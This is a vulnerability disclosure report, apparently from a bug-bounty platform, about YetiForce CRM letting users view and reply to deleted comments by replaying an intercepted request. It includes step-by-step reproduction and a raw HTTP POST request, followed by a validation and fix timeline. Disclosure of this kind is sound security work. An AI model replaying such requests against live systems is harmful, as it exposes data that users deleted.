User can get details of the comments that were deleted in yetiforcecompany/yetiforcecrm

Valid

Reported on

Sep 19th 2022


Description

When a user creates a new record he can add a comment on it. The user is also able to delete the comments after which the user wont be having access to that comment like replying, checking what the comment was. This vulnerability allows any user to see what the deleted comment was and also to reply on that comment.

Proof of Concept

1.Login into the application https://gitstable.yetiforce.com/index.php?module=Accounts&view=Detail&record=2029 .

2.Go to create records and create new.

test

3.Enter a new comment and click on save.

4.Reply on the comment created and intercept the request.

5.Send the request to the repeater.

6.Delete the comment that you created.

test

7.Send the request in the repeater and the details of the deleted comment is exposed.

test

POST /index.php HTTP/1.1
Host: gitstable.yetiforce.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 153
Origin: https://gitstable.yetiforce.com
Connection: close
Cookie: YTSID=50trt9s5he1qontpsn2ktvdab9; _pk_id.10.6d7c=d037ceed70283778.1663586607.; _pk_ses.10.6d7c=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

_csrf=sid:3eb187103ad72d3dbb5c9c5cbe0d059c0111704b,1663590705&action=SaveAjax&commentcontent=test&related_to=2029&module=ModComments&parent_comments=2054```



# Impact

The user can get details of all the comments that were deleted by other users.
We are processing your report and will contact the yetiforcecompany/yetiforcecrm team within 24 hours. 2 months ago
irfansayyed-github modified the report
2 months ago
irfansayyed-github modified the report
2 months ago
irfansayyed-github modified the report
2 months ago
irfansayyed-github modified the report
2 months ago
irfansayyed-github modified the report
2 months ago
We have contacted a member of the yetiforcecompany/yetiforcecrm team and are waiting to hear back 2 months ago
We have sent a follow up to the yetiforcecompany/yetiforcecrm team. We will try again in 7 days. 2 months ago
Radosław Skrzypczak validated this vulnerability 2 months ago
irfansayyed-github has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Radosław Skrzypczak marked this as fixed in 6.4.0 with commit f06e50 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
irfansayyed-github
2 months ago

Researcher


@admin,

Could we get a CVE.

Ben Harvie
2 months ago

Admin


Hi irfansayyed-github,

We can assign a CVE to this report at the request of the maintainer.

Thanks

to join this conversation